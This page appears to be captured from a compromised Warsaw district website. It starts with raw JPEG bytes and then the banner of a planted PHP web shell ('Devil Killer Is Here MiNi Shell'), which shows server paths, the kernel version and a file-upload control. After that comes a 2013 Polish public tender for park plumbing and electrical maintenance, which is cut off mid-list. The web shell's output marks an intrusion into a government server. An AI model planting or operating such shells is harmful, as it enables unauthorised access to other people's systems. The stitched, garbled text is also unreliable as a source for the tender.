JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130130/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130130/40370-N-2013.html

<p class="kh_header"><b>Warszawa: Nadzór i konserwacja oraz naprawy i usuwanie awarii na instalacjach wodno - kanalizacyjnych oraz instalacjach elektrycznych w Parku im. Jana Pawła II, na terenie rekreacyjnym Olkówek, przy boisku ,Orlik 2012 i w Parku Przy Bażantarni oraz w Parku Lasek Brzozowy.</b><br>
<b>Numer ogłoszenia: 40370 - 2013; data zamieszczenia: 30.01.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miasto Stołeczne Warszawa Dzielnica Ursynów , al. Komisji Edukacji Narodowej 61, 02-777 Warszawa, woj. mazowieckie, tel. 022 5457100, faks 022 5457291.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.ursynow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Nadzór i konserwacja oraz naprawy i usuwanie awarii na instalacjach wodno - kanalizacyjnych oraz instalacjach elektrycznych w Parku im. Jana Pawła II, na terenie rekreacyjnym Olkówek, przy boisku ,Orlik 2012 i w Parku Przy Bażantarni oraz w Parku Lasek Brzozowy..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem niniejszego zamówienia jest Nadzór i konserwacja oraz naprawy i usuwanie awarii na instalacjach wodno - kanalizacyjnych oraz instalacjach elektrycznych w Parku im. Jana Pawła II, na terenie rekreacyjnym Olkówek, przy boisku Orlik 2012  i w Parku Przy Bażantarni oraz w Parku Lasek Brzozowy.

Do zakresu prac należą:

I.	Nadzór i konserwacja instalacji wodno - kanalizacyjnej 

Zakres prac obejmuje pełnienie nieprzerwanych, tj. w dni powszednie i świąteczne, dyżurów technicznych oraz wykonywanie konserwacji i napraw bieżących instalacji. W zakres prac naprawczych objętych zamówieniem wchodzą prace związane z bieżącym utrzymaniem instalacji oraz prace konieczne do wykonania w wyniku stwierdzonych przez Wykonawcę lub zgłoszonych mu przez Zamawiającego awarii i uszkodzeń instalacji i urządzeń oraz inne drobne prace.
 Obowiązkiem Wykonawcy jest utrzymanie instalacji wodno - kanalizacyjnej we właściwym stanie i zapewnienie jej prawidłowego funkcjonowania, bez przerw w działaniu. Codziennie należy dokonywać przeglądów stanu instalacji oraz wykonywać, w ramach wynagrodzenia ryczałtowego,  następujące czynności:
1.	przygotowywanie wodomierzy do odczytów, odczytywanie stanu wodomierzy (liczniki główne i podliczniki) i dokonywanie zgłoszeń do Wydziału Ochrony Środowiska Urzędu Dzielnicy Ursynów m.st. Warszawy oraz do MPWiK w odpowiednim czasie, wyznaczonym przez MPWiK, i formie (formularz). Wykonawca będzie otrzymywał od Zamawiającego kopie pism dot. odczytów;
2.	kontrolowanie i okresowe przeglądy instalacji wodno - kanalizacyjnej;
3.	utrzymanie w należytym stanie studni wodomiarowej - Park im. Jana Pawła II, Park Przy Bażantarni, Park Lasek Brzozowy; 
4.	niezwłoczne zgłaszanie na piśmie wszelkich usterek zaobserwowanych w pracy instalacji wodno-kanalizacyjnej;
5.	drobne naprawy bieżące oraz wymiana uszkodzonych elementów wyposażenia, w tym m.in. śrub, zaworów, syfonów, baterii, uszczelek, odcinków rur; 
6.	sprawdzanie drożności kratek odpływowych oraz w razie potrzeby ich udrożnienie, wraz z uzupełnieniem brakujących lub uszkodzonych kratek, pokryw rewizyjnych, itp. oraz czyszczenie kratek ściekowych wiosną i jesienią;
7.	czyszczenie kratek ściekowych, odwodnień liniowych, studzienek w miarę potrzeb oraz na wezwanie Zamawiającego (w tym wywóz odpadów);
8.	naprawy kołnierzy studzienek, wyniesienie studzienek itp.; 
9.	sprawdzanie drożności przewodów kanalizacyjnych i usuwanie stwierdzonych lub zgłoszonych niedrożności;
10.	zabezpieczenie instalacji na okres zimowy (zabezpieczenie przed zamarznięciem instalacji);
11.	wykonywanie podłączeń nowo zakupionego sprzętu i urządzeń do instalacji wodno - kanalizacyjnej.


II.	Nadzór i konserwacja instalacji elektrycznej  

Zakres prac obejmuje pełnienie nieprzerwanych, tj. w dni powszednie i świąteczne, dyżurów technicznych oraz wykonywanie konserwacji i napraw bieżących instalacji. W zakres prac naprawczych objętych zamówieniem wchodzą prace związane z bieżącym utrzymaniem instalacji oraz prace konieczne do wykonania w wyniku stwierdzonych przez Wykonawcę lub zgłoszonych mu przez Zamawiającego awarii i uszkodzeń instalacji i urządzeń oraz inne drobne prace. Obowiązkiem Wykonawcy jest utrzymanie instalacji i urządzeń elektrycznych we właściwym stanie i zapewnienie ich prawidłowego funkcjonowania, bez przerw w działaniu. Codziennie należy dokonywać przeglądów stanu instalacji oraz wykonywać, w ramach wynagrodzenia ryczałtowego, następujące czynności:
1.	kontrolowanie instalacji elektrycznej;
2.	utrzymanie instalacji w należytym stanie; 
3.	niezwłoczne zgłaszanie na piśmie wszelkich usterek zaobserwowanych w pracy instalacji elektrycznej;
4.	wykonywanie okresowych przeglądów oraz konserwacji instalacji elektrycznej;
5.	sprawdzanie tablic rozdzielczych i bezpiecznikowych z usuwaniem i wymianą na nowe przepalonych bezpieczników oraz usuwanie przyczyn przegrzewania się bezpieczników;
6.	wymiana przepalonych źródeł światła;
7.	wymiana uszkodzonego osprzętu instalacyjnego;
8.	utrzymanie w prawidłowym stanie technicznym i estetycznym zewnętrznej instalacji oświetlenia terenu;
9.	przeglądy stanu technicznego instalacji odgromowych z ewentualnym usunięciem uszkodzeń i zabezpieczeniem połączeń;
10.	wydawanie orzeczeń o nieprzydatności urządzeń do dalszej eksploatacji;
11.	we wskazanym terminie dokonywanie odczytów liczników energii elektrycznej i przekazanie informacji do Wydziału Ochrony Środowiska Urzędu Dzielnicy Ursynów m.st. Warszawy;
12.	wykonywanie bieżącej kontroli stanu technicznego instalacji elektrycznej;
13.	wykonywanie podłączeń do sieci energetycznej nowo zakupionych urządzeń i sprzętu.

Zakres prac obejmuje również:

Park im. Jana Pawła II:
- modyfikacje ustawień zegara sterującego oświetleniem boiska; zegar powinien być ustawiony w taki sposób, aby załączał oświetlenie wraz z zapadaniem zmroku, a wyłączał o godzinie 22:00 w okresie wiosenno-letnim oraz o godzinie uzgodnionej z Zamawiającym w okresie jesienno-zimowym;
- konserwację linii zasilającej;
oraz, w miarę potrzeb oraz na wezwanie Zamawiającego:
- czyszczenie 98 szt. opraw lamp oświetleniowych;
- zabezpieczenie nadziemnej części słupów odpowiednim preparatem (dotychczas stosowane były: IZOLBET-A lub Abizol R) do wysokości 1 m - 78 szt.;
- malowanie słupów farbą do metalu w kolorze dotychczasowym RAL 7021- 78 szt.,
- modyfikację ustawienia lamp oświetlających boisko sportowe (w razie konieczności).
 
Boisko Orlik 2012 i Park Przy Bażantarni: 
W miarę potrzeb oraz na wezwanie Zamawiającego oczyszczenie wszystkich opraw lamp oświetleniowych  oraz  malowanie wszystkich słupów do wysokości 1 metra odpowiednim preparatem (dotychczas stosowany był Abizol R), a powyżej tej wysokości farbą do metalu w kolorze dotychczasowym.

Park Lasek Brzozowy:
W miarę potrzeb oraz na wezwanie Zamawiającego oczyszczenie wszystkich opraw lamp oświetleniowych oraz oczyszczenie lamp stojących.

Na wyposażenie obiektów składają się m.in.:

Park im. Jana Pawła II: 
- źródła oświetlenia (SON 70W) w lampach sodowych w oprawach typu Lampion 05 
- układy zapłonowe do opraw sodowych w oprawach typu Lampion 05 (zapłonniki UTUZ) 
- stateczniki sodowe 70 W w latarniach parkowych
- oprawy oświetlenia do lamp sodowych parkowych
- klosze do lamp sodowych parkowych wraz z elementami przejściowymi 
- źródła oświetlenia w oprawach metalohalogenkowych MWF 330/400 S-K (PHILIPS) (lampa MH MASTER HPI-T Plus 400 W) 
- układy zapłonowe do opraw metalohalogenkowych
- oprawy metalohalogenkowe (projektory) 
- źródła oświetlenia SON-T PLUS 250W w oprawach SVF 607 N 250 (PHILIPS) 
- układy zapłonowe w oprawach SVF 607 N 250 (PHILIPS)
- oprawy SVF 607 N 250 (naświetlacz MVF507 SON-T250W 230 I NE GR) 
- wkładki bezpiecznikowe
- oprawy świetlówkowe
- oprawy halogenowe
- zapłonniki
- świetlówki
- żarówki
- gniazda podwójne z uziemieniem p/t 
- gniazda pojedyncze z uziemieniem p/t 
- przewody YDY-450/750 V 5x16 mm2 
- przewody YDYp-750V 2x1,5 mm2 
- przewody YDYp-750V 4x1,5 mm2 
- przewody YDYt-750V 3x2,5 mm2 
- ochronniki DEHNguard 
- ochronniki ON 324 prod. Legrand 
- inwertory 2h 
- akumulatory inwertorów
- bezpieczniki nadmiarowe
- wyłączniki FR 
- stateczniki 
- styczniki

Teren rekreacyjny Olkówek:
- oprawy oświetleniowe
- wysokoprężne lampy sodowe (70W)

Boisko Orlik 2012 i Park Przy Bażantarni: 
- oprawy fluorescencyjne świetlówkowe 
- świetlówki do opraw fluorescencyjnych 
- gniazda wtykowe  
-  łączniki 
- oprawy ZM.011.3 Powelug S.A 
-  źródła oświetlenia w oprawach oświetleniowych ZM.011.3  Powelug S.A
- oprawy oświetleniowe NOCTIS 
- oprawy oświetleniowe CORUS 
- oprawy oświetleniowe ALURA 70 
-  źródła oświetlenia w oprawach oświetleniowych ZM.011.3  Powelug S.A.
-  źródła oświetlenia w oprawach oświetleniowych   NOCTIS 
-  źródła oświetlenia w oprawach oświetleniowych CORUS 
-  źródła oświetlenia w oprawach oświetleniowych  ALURA
-  bezpieczniki nadmiarowe  
-  styczniki suche
-  wkładki topikowe  
-  aparaty elektryczne -  zegar sterujący oświetleniem 

Park Lasek Brzozowy:
-  oprawy lamp  metalohalogenkowych  
- źródła oświetlenia lamp metalohalogenkowych  z rodziny Master City White CDO-TT 
Uwaga: Prace na terenie Parku Lasek Brzozowy będą wykonywane od momentu podłączenia instalacji na terenie obiektu i przekazaniu jej do eksploatacji.

III.	Dekoracja obiektów

Zakres prac obejmuje montaż,  w miejscach wskazanych przez Zamawiającego, (w tym wpięcie do sieci elektrycznej) wraz z obsługą serwisową elementów dekoracji świetlnych, a także montaż dekoracji innego typu na terenie w/w obiektów oraz demontaż w/w ozdób. Do zakresu prac należy również zakup dodatkowych elementów dekoracyjnych po ustaleniu takiej potrzeby z Zamawiającym.
Wykonawca uzgodni warunki podpięcia do sieci elektrycznej oraz poniesie wszelkie ewentualne koszty z tym związane.
Sposób montażu i łączenia elementów musi zapewnić pełne bezpieczeństwo, zastosowane napięcie: 24 V (bezpieczne), zabezpieczenie przeciwporażeniowe.
Przewiduje się zastosowanie np. elementów dekoracyjnych z węża świetlnego, łańcuchów świetlnych, figur świetlnych 3D, dekoracji z igliwia i PCV i innych elementów dekoracyjnych takich jak np. bombki, łańcuchy itp.
W przypadku podjęcia przez Zamawiającego decyzji o potrzebie zakupienia dodatkowych elementów dekoracyjnych, Wykonawca dokona zakupu po wcześniejszym uzgodnieniu z Zamawiającym rodzaju i ilości oraz maksymalnego kosztu elementów dekoracyjnych. W takim przypadku Zamawiający pokryje koszty materiałów niezbędnych do wykonania prac. Wykonawca pokryje zaś wszelkie pozostałe koszty związane z dostawą, montażem i obsługa serwisową oraz demontażem  ozdób, w tym m.in. koszty robocizny, sprzętu, transportu materiałów, przygotowania i zabezpieczenia terenu prowadzenia prac, uporządkowania terenu po zakończeniu prac itd. Zamawiający pokryje koszty zakupu materiałów (cenę materiałów) na podstawie faktur przedstawionych przez Wykonawcę, zgodnych z wcześniejszymi ustaleniami - spisem i wyceną, zawierających nazwy materiałów, ich ilości, ceny i łączną wartość netto i brutto. Zwrot ceny nastąpi po weryfikacji wykonania prac, na podstawie protokołu odbioru.

Wykonawca zobowiązany jest zapewnić 24 godz. obsługę serwisową, w tym stały nadzór nad właściwym stanem dekoracji, w tym jej sprawnością oraz wykonywać niezbędne naprawy i usuwać awarie w okresie od momentu montażu dekoracji do momentu jej demontażu. Długość tego okresu będzie ustalana na bieżąco z Zamawiającym. Do prac związanych z usunięciem awarii lub dokonaniem napraw należy przystąpić w ciągu 3 godzin od jej wystąpienia lub od zgłoszenia awarii lub usterki. W przypadkach zagrożenia ludzi lub mienia Wykonawca ma obowiązek niezwłocznie przystąpić do usunięcia awarii lub usterki. Zgłoszenie może być dokonane telefonicznie.

IV. Usuwanie awarii i naprawy, w tym zasady nabywania materiałów i podzespołów urządzeń potrzebnych do wykonywania prac przez Wykonawcę i rozliczania kosztów ich zakupu.

W przypadku wystąpienia awarii wymagającej użycia materiałów i podzespołów o wartości do 500,00 zł brutto Wykonawca zobowiązany jest zabezpieczyć miejsce awarii (zabezpieczyć instalacje objęte umową przed ewentualnymi  szkodami, mogącymi powstać w następstwie zaistniałej awarii oraz zlikwidować powstałe zagrożenie), powiadomić Zamawiającego telefonicznie i pisemnie, dokonać stosownego wpisu do dziennika eksploatacji instalacji i przystąpić do czynności naprawczych, w ramach wynagrodzenia ryczałtowego.
Koszty zakupu i dostarczenia oraz montażu i demontażu materiałów i podzespołów urządzeń, konieczne do wykonania bieżących prac konserwacyjnych bądź prac naprawczych danego rodzaju, w przypadku, gdy koszt materiałów lub podzespołów nie przekracza 500 zł brutto, ponosi Wykonawca.
Wynagrodzenie ryczałtowe obejmuje wszelkie koszty związane z usunięciem awarii i wykonaniem napraw, w tym m.in. koszty robocizny, sprzętu, materiałów, transportu materiałów, przygotowania i zabezpieczenia terenu prowadzenia prac, uporządkowania i odtworzenia terenu po zakończeniu prac itd.

W przypadku wystąpienia awarii wymagającej użycia materiałów i podzespołów o wartości przekraczającej 500,00 zł brutto Wykonawca zobowiązany jest zabezpieczyć miejsce awarii (zabezpieczyć instalacje objęte umową przed ewentualnymi  szkodami, mogącymi powstać w następstwie zaistniałej awarii oraz zlikwidować powstałe zagrożenie), powiadomić Zamawiającego telefonicznie i pisemnie i przekazać Zamawiającemu spis materiałów niezbędnych do usunięcia awarii wraz z przeprowadzoną wyceną oraz dokona odpowiedniego wpisu do dziennika eksploatacji instalacji i po uzyskaniu akceptacji Zamawiającego przystąpi do czynności naprawczych.
W takim przypadku Zamawiający pokryje koszty materiałów niezbędnych do wykonania prac. Wykonawca pokryje zaś wszelkie pozostałe koszty związane z usunięciem awarii i wykonaniem napraw, w tym m.in. koszty robocizny, sprzętu, transportu materiałów, przygotowania i zabezpieczenia terenu prowadzenia prac, uporządkowania i odtworzenia terenu po zakończeniu prac itd. Każdorazowo Wykonawca przedstawi spis i wycenę materiałów do akceptacji przez Zamawiającego. Zakup materiałów i podzespołów o wartości przekraczającej podany limit wymaga uprzedniej akceptacji Zamawiającego. Zamawiający pokryje koszty zakupu materiałów i podzespołów (cenę materiałów i podzespołów) na podstawie faktur przedstawionych przez Wykonawcę, zgodnych z wcześniejszymi ustaleniami - spisem i wyceną, zawierających nazwy materiałów i podzespołów, ich ilości, ceny i łączną wartość netto i brutto. Zwrot ceny nastąpi po weryfikacji wykonania prac, na podstawie protokołów odbioru.

Czas zgłoszenia się konserwatora do usunięcia awarii nie może być dłuższy niż 3 godziny od jej wystąpienia lub od momentu otrzymania zawiadomienia o awarii, jednak w przypadku, gdy awaria stwarza zagrożenie, do prac (w tym zabezpieczenia terenu i urządzeń oraz naprawy) należy przystąpić niezwłocznie. 

V. Prowadzenie dzienników eksploatacji instalacji 
Do zakresu prac Wykonawcy należy prowadzenie dzienników eksploatacji instalacji wodno-kanalizacyjnej i elektrycznej, osobno dla każdego obiektu. Wykonawca ma obowiązek zapisywać w dziennikach wszystkie czynności wykonane w ramach umowy, w tym awarie i czynności konserwatora wykonane przy jej usuwaniu. Dzienniki przechowywane będą u Wykonawcy i okazywane na każde wezwanie Zamawiającego. Kopię odpowiednich stron dzienników należy przekazywać Zamawiającemu przed odbiorem prac, co najmniej jeden raz w miesiącu.

Gwarancja:
Wykonawca udziela Zamawiającemu pisemnej gwarancji i rękojmi na wykonany przedmiot umowy i użyte do jego wykonania materiały oraz jakość ich montażu. Gwarancja obejmuje trwałość i jakość zastosowanych wyrobów, w tym m.in.: powłoki malarskie, odporność na pęknięcia i zabezpieczenie antykorozyjne, odporność na odkształcenia, odporność na pęknięcia. 

Warunki wykonania prac :
1.	Powyższe czynności Wykonawca zobowiązuje się wykonywać rzetelnie i zgodnie ze sztuką.
2.	Wszystkie prace należy wykonywać zgodnie z zasadami bezpieczeństwa i higieny pracy oraz przepisami szczegółowymi dotyczącymi wykonywania robót elektrycznych.
3.	Prace remontowe i konserwacyjno-eksploatacyjne muszą być wykonywane przez osobę z odpowiednimi uprawnieniami, a każda czynność musi być wpisana do dziennika eksploatacji instalacji. 
4.	Wykonawca jest odpowiedzialny za jakość wykonywanych prac oraz bezpieczeństwo pracowników i użytkowników obiektów podczas wykonywania prac. 
5.	Wykonawca zapewni i będzie utrzymywał wszelkie urządzenia zabezpieczające, socjalne oraz sprzęt i odpowiednią odzież dla ochrony życia i zdrowia osób zatrudnionych przy wykonywaniu prac.
6.	Wykonawca ma obowiązek znać i stosować w czasie prowadzenia prac wszelkie przepisy dotyczące bhp i ochrony środowiska naturalnego, w tym m.in. przepisy dotyczące zniszczenia i usuwania drzew i krzewów.
7.	Wykonawca będzie stosować się do ustawowych ograniczeń nacisków osi na drogach publicznych.
8.	Wykonawca będzie odpowiadał za naprawę wszelkich zniszczeń spowodowanych z jego winy i będzie ponosił pełną odpowiedzialność za szkody wyrządzone osobom trzecim. 
9.	Wykonawca zobowiązany jest do usunięcia na swój koszt wszelkich szkód, które powstały w trakcie wykonywania prac (dot. m.in. materiału roślinnego - wymiana roślin uszkodzonych na rośliny o parametrach zaakceptowanych przez Zamawiającego oraz ewentualnych uszkodzeń nawierzchni, kabli, instalacji nadziemnych). 
10.	Wykonawca zobowiązany jest znać wszelkie zarządzenia wydane przez władze centralne i miejscowe oraz inne przepisy, regulaminy i wytyczne, które są w jakikolwiek sposób związane z wykonywanymi pracami i będzie w pełni odpowiedzialny za przestrzeganie tych postanowień podczas prowadzenia prac.
11.	Sprzęt będący własnością Wykonawcy lub wynajęty do wykonywania prac musi być utrzymywany w dobrym stanie i w gotowości do pracy oraz powinien być zgodny z normami dot. ochrony środowiska i przepisami dotyczącymi jego użytkowania.
12.	Wykonawca zobowiązany jest do zapewnienia telefonicznego kontaktu z Zamawiającym przez całą dobę.
13.	Wykonawca zobowiązany jest do posiadania przez cały okres wykonywania prac polisy ubezpieczenia od odpowiedzialności cywilnej w zakresie wykonywanych prac.
14.	Zakres prac obejmuje wszelkie możliwe koszty, w tym: pracy ludzi i sprzętu, zabezpieczenia terenu poprzez właściwe oznakowanie miejsc prowadzenia prac, zakupu i transportu materiałów niezbędnych do wykonania prac (z zastrzeżeniem zapisów pkt IV), koszty uprzątnięcia terenu po wykonaniu prac, inne opłaty, które będą niezbędne w celu kompletnego i terminowego wykonania prac.
15.	Wykonawca przedłoży Zamawiającemu imienną listę pracowników wykonujących pracę w jego imieniu na rzecz Zamawiającego wraz z udokumentowaniem ich kwalifikacji. 
16.	Wykonawca odpowiada za to, by aktualne numery telefonów do konserwatorów zostały podane do wiadomości Zamawiającego i wywieszone we wskazanych miejscach na terenie obiektów. Wykonawca uzgodni z Zamawiającym jeden numer telefoniczny jako numer do kontaktu.

Szczegółowy opis przedmiotu zamówienia określa wzór umowy stanowiący załącznik nr 5 do SIWZ..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje możliwość udzielenia zamówień uzupełniających, o których mowa w art. 67 ust. 1 pkt 6) ustawy Prawo zamówień publicznych, o łącznej wartości do 50% wartości zamówienia podstawowego. Zamówienia uzupełniające polegać będą na powtórzeniu tego samego rodzaju usług, zgodnych z przedmiotem zamówienia podstawowego.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 50.80.00.00-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Oferta musi być zabezpieczona wadium w wysokości: 1 000,00 zł (słownie: jeden tysiąc złotych)</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Nie dotyczy</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca w okresie ostatnich 3 lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie należycie wykonywał lub wykonuje:
1)	co najmniej jedną usługę, polegającą na nadzorze i konserwacji zewnętrznych instalacji wodno - kanalizacyjnych oraz instalacji elektrycznych na terenie np. parków lub skwerów lub osiedli mieszkaniowych, nieprzerwanie przez okres co najmniej 6 miesięcy;
2)	co najmniej jedną usługę, polegającą na naprawie lub usunięciu awarii na zewnętrznych instalacjach wodno - kanalizacyjnych na terenie np. parków lub skwerów lub osiedli mieszkaniowych;
3)	co najmniej jedną usługę, polegającą na naprawie lub usunięciu awarii na zewnętrznych instalacjach elektrycznych na terenie np. parków lub skwerów lub osiedli mieszkaniowych.

Ocena spełniania warunku udziału w postępowaniu dokonana zostanie w systemie 1 lub 0, zgodnie z formułą spełnia-nie spełnia w oparciu o informacje zawarte w oświadczeniu wyszczególnionym w pkt III.4.1) Ogłoszenia. Z treści załączonego oświadczenia musi wynikać jednoznacznie, iż w/w warunek Wykonawca spełnił.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Nie dotyczy</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca wykaże, że dysponuje osobami zdolnymi do wykonania zamówienia, w szczególności co najmniej:
dwiema osobami, które wykonywać będą prace w zakresie obsługi instalacji i urządzeń elektrycznych, posiadającymi odpowiednie uprawnienia wydane zgodnie z Rozporządzeniem Ministra Gospodarki, Pracy i Polityki Społecznej z dnia 28 kwietnia 2003 r. w sprawie szczegółowych zasad stwierdzania posiadania kwalifikacji przez osoby zajmujące się eksploatacją urządzeń, instalacji i sieci (Dz.U. z 2003 r., nr 89, poz. 828 z późn. zm.), w tym co najmniej:

